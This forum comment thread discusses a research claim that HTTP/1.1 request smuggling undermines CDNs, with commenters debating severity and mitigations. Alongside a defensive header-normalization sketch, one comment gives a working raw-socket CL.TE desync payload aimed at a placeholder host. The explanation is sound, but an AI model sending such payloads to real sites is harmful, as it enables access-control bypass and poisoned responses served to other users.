> Hi, I’m the author of this research. It’s great to see interest and I can promise some quality research and a strong argument to kill HTTP/1.1 but the headline of this article goes a bit too far. The specific CDN vulnerabilities have been disclosed to the vendors and patched (hence the past tense in the abstract) – I wouldn’t drop zero day on a CDN!
From the comment section. In other words, click-bait title.
I think I figured out a way to do secure registration with a MITM without certificates, so there might be a way out of this mess.
But you still need to transfer the client and check its hash for it to work, and that's hard to implement in practice.
But you could bootstrap the thing over HTTPS (the download of the client) and then never need it again, which is neat. Especially if you use TCP/HTTP now.
Appreciate you pointing that out. HTTP/1.1 may be relatively long in the tooth, but this particular vulnerability seems straightforward to mitigate to me. Especially at the CDN level.
Forgive my optimism here, but this seems overblown and trivial to detect and reject in firewalls/CDNs.
Cloudflare most recently blocked a vulnerability affecting some PHP websites where a ZIP file upload contains a reverse shell. This seems plain in comparison (probably because it is).
This sensationalist headline and that doomsday-style clock (as another poster shared) make me question the motives of these researchers. Have they shorted any CDN stocks?
The underlying flaw is a parser differential. To detect that generically you'd need a model of both(/all) parsers involved, and to detect when they diverge. This is non-trivial.
You can have the CDN normalize requests so that it always emits well-formed requests upstream. This way only one parser deals with untrusted / ambiguous input.
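A minimal sketch of that normalization idea, assuming a hypothetical Python hook in the front-end (not any CDN's actual code): the HTTP/1.1 spec (RFC 9112) says that when both Transfer-Encoding and Content-Length are present, Transfer-Encoding wins, and the safe moves are to drop the Content-Length or reject the request outright.

    # Hypothetical normalization hook a front-end proxy could run before
    # forwarding a request upstream; a sketch, not any CDN's actual code.

    def normalize_framing(headers: dict[str, str]) -> dict[str, str]:
        """Return headers with unambiguous message framing.

        RFC 9112 says that when both Transfer-Encoding and Content-Length
        are present, Transfer-Encoding wins; the safe options are to drop
        Content-Length or reject the request outright.
        """
        lower = {k.lower(): k for k in headers}  # case-insensitive lookup
        has_te = "transfer-encoding" in lower
        has_cl = "content-length" in lower

        if has_te and has_cl:
            # Option shown here: strip the ambiguous Content-Length.
            # Stricter option: raise and answer 400 Bad Request instead.
            del headers[lower["content-length"]]

        if has_te and headers[lower["transfer-encoding"]].strip().lower() != "chunked":
            # Obfuscated codings ("chunked , chunked", "xchunked", ...) are a
            # classic smuggling vector; reject rather than guess.
            raise ValueError("unsupported Transfer-Encoding")

        return headers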
"Stop working" here apparently means scheduled release of an exploit of a vulnerability in proxies that do access control and incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
> incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
I think the article uses this as an example of the concept of Request Smuggling in general. This broad approach has been known for a long time. I assume the new research uses conceptually similar but concretely different approaches to trigger parser desyncs.
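For concreteness, a rough sketch of the classic CL.TE shape of such a request (Python over a raw socket; "target.example" is a placeholder): the two framing headers disagree, so a front-end that honors Content-Length and a back-end that honors Transfer-Encoding split the byte stream at different points.

    # Rough illustration of the classic CL.TE desync payload, sent over a raw
    # socket. "target.example" is a placeholder; only aim this at hosts you own.
    import socket

    payload = (
        b"POST / HTTP/1.1\r\n"
        b"Host: target.example\r\n"
        b"Content-Length: 6\r\n"           # front-end: body is the 6 bytes "0\r\n\r\nG"
        b"Transfer-Encoding: chunked\r\n"  # back-end: body ends at the zero-size chunk
        b"\r\n"
        b"0\r\n"
        b"\r\n"
        b"G"  # the back-end treats this leftover byte as the start of the *next* request
    )

    with socket.create_connection(("target.example", 80)) as s:
        s.sendall(payload)
        print(s.recv(4096).decode(errors="replace"))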
I might just be stupid, but I'm not quite seeing the full issue, I think.
From my reading this is a problem if:
1. Your CDN/Load balancer allows for HTTP/1.1 connections
2. You do some filtering/firewalling/auth/etc at your CDN/Load balancer for specific endpoints
I'm sure it's more than that, and I'm just missing it.
If you do all your filtering/auth/etc. on your backend servers this doesn't matter, right? Obviously people DO filtering/auth/etc. at the edge, so they would be affected, but 1/3rd seems high. Maybe 1/3rd of traffic is HTTP/1.1, but they would also have to be doing filtering/auth at the edge to be hit by this, right?
Again, for the 3rd time, I'm probably missing something, just trying to better understand the issue.
If it's similar to a vulnerability reported a couple of years back, the gist of it would be:
Some load balancers front multiple application connections through multiplexed requests on a single HTTP/1.1 connection, and bugs occur in the handling (generally around request boundaries).
For example, you can have an HTTP/1.1 front connection that behind the scenes operates a separate HTTP/1.0, 1.1, 2, or 3 connection.
When smuggling additional data through the request, you trip up the handler at the load balancer into emitting a response that shouldn't be there, which will be served to one of the clients (even to the wrong client's request).
Similar to HTTP response splitting attacks of the past.
E.g. three requests come into the load balancer, and request 2 smuggles in an extra request whose response could be served as the response to request 1 or 3.
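A toy illustration of why the wrong client can receive that extra response (a simulation only, not how any real proxy is implemented): front-ends that reuse one upstream connection typically pair upstream responses with downstream requests in strict FIFO order, so one unexpected extra response shifts every pairing after it.

    # Toy simulation of FIFO request/response pairing on a reused upstream
    # connection. Not a real proxy; it only shows the off-by-one effect.
    from collections import deque

    # Requests forwarded upstream, in order (client B's request hides a
    # second, smuggled request inside its body).
    forwarded = deque([
        "req1 (client A)",
        "req2 (client B, smuggles req2b)",
        "req3 (client C)",
    ])

    # What the back-end actually parsed and answered, in order.
    upstream_responses = deque(["resp1", "resp2", "resp2b (smuggled)", "resp3"])

    # The front-end pairs them strictly first-in, first-out.
    while forwarded:
        print(f"{forwarded.popleft():35} <- {upstream_responses.popleft()}")

    # Client C gets resp2b (the answer to the smuggled request), and resp3 is
    # left queued for whichever client happens to reuse the connection next.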
Is it really impossible for the CDNs to mitigate the vulnerability without disabling the site altogether? I'm skeptical that is the case. I'm sure there is a way to properly separate different requests.
There was a mad dash to patch stuff, but there wasn't much destruction. It became mostly a nothingburger event because of preparation to fix things ahead of time and triage for the bits that did break.
I have used HTTP/1.1 pipelining outside the browser for 17 years^2
It works beautifully for me outside the browser
Today I use 1.1 pipelining literally every day. Almost all websites I encounter still support and enable it
Would love to see some examples of sites that do not accept HTTP/1.1 and only accept HTTP/[23]
1. Unlike the designers of HTTP/1.1, the designers of HTTP/2 have made mistakes, bad enough to warrant an immediate replacement
"This head-of-line blocking in HTTP/2 is now widely regarded as a design flaw, and much of the effort behind QUIC and HTTP/3 has been devoted to reduce head-of-line blocking issues.^[58]^[59]"
58. Huston, Geoff (March 4, 2019). "A Quick Look at QUIC". www.circleid.com. Retrieved August 2, 2019.
59. Gal, Shauli (June 22, 2017). "The Full Picture on HTTP/2 and HOL Blocking". Medium. Retrieved August 3, 2019.
This is interesting to me since head-of-line blocking is allegedly the "problem" with HTTP/1.1 (cf. the problem with advertising-sponsored web browsers) that HTTP/2 was supposed to "solve"^3
2. To retrieve multiple resources from the same host in a single TCP connection. (Unlike browsers that routinely open up dozens of TCP connections to multiple hosts, usually for telemetry/advertising/tracking purposes.) It is desirable for me to receive the responses in the same order the requests were sent. As such, "HOL" is a non-issue for me.
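For what it's worth, a minimal sketch of that usage pattern (Python over a raw socket; www.example.com is a placeholder): both requests are written back-to-back on one TCP connection, and per HTTP/1.1 the responses come back in the order the requests were sent.

    # Minimal HTTP/1.1 pipelining sketch: two requests on one TCP connection,
    # responses come back in request order. "www.example.com" is a placeholder.
    import socket

    host = "www.example.com"
    requests = b"".join(
        f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: keep-alive\r\n\r\n".encode()
        for path in ("/", "/robots.txt")
    )

    with socket.create_connection((host, 80)) as s:
        s.sendall(requests)  # both requests written before reading anything back
        s.settimeout(2)
        data = b""
        try:
            while chunk := s.recv(4096):
                data += chunk
        except socket.timeout:
            pass

    # Both responses now sit in `data`, back-to-back, in the order requested;
    # a real client would parse Content-Length / chunked framing to split them.
    print(data.count(b"HTTP/1.1 "), "status lines seen")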
HTTP/3 reminds me of CurveCP, which was published years before QUIC^4
Except the HTTP/3 RFC is written by an Akamai employee, whereas CurveCP is from an academic, like HTTP/1.1
Also, CurveCP needs no "SNI" that leaks domain names in plaintext the way TLS does, and hence needs no complicated Band-Aid like ECH. Still waiting for ECH to be available outside of maybe a limited percentage of sites on a single CDN (Cloudflare).^5 It has been years.